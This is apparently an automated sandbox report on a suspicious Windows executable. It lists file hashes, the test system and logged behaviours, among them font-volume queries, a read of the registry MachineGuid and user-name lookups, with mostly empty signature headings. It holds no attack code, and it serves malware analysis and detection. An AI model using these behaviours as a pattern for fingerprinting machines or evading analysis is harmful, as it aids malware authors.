Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00455644 GetUserNameA,

1_2_00455644

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

1_2_00458670

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_00405CF4 GetVersionExA,

0_2_00405CF4

ID:	553343
Product:	CloudBasic
Start time:	17:58:15
Start date:	14.01.2022
Sample:	1nJGU59JPU
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	aea21ab88cca720a34ec1c9c4794f82a
SHA1:	5241d6fd4013ec8251df46e231665471a8ca70db
SHA256:	498421bc4c78ba9bf7c9d669bd9958cf2c0c1cc89e94288800fe004400821ef3
Filetype:	Win32 Executable (generic) a (10002005/4) 98.86%

Windows Analysis Report 1nJGU59JPU

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Networking:

DDoS:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs